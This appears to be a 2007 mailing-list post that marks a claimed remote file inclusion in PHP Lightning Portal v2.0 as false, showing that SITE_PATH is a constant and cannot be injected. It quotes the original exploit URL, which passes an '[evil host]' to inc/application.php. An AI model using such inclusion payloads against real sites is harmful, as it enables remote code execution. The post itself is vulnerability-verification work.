[VIM] FALSE: PHP LIGHTNING PORTAL (PLP) v.2.0 Remote File Inclusion
str0ke
str0ke at milw0rm.com
Fri Feb 2 12:04:01 EST 2007
define('SITE_PATH','/var/www/htdocs/'); //with trailing "/"
require SITE_PATH.'inc/lib.inc.php';
Enough said.
/str0ke
* Portal Name = PHP LIGHTNING PORTAL (PLP) v.2.0
* Class = Remote File Inclusion
* Risk = High
* Download = http://www.alarit.com/downloads/products/plp_2_0_demo.zip
**********************************************************************************
- Exploit:
http://www.site.com/[script path]/inc/application.php?SITE_PATH=[evil host]
***********************************************************************************
More information about the VIM
mailing list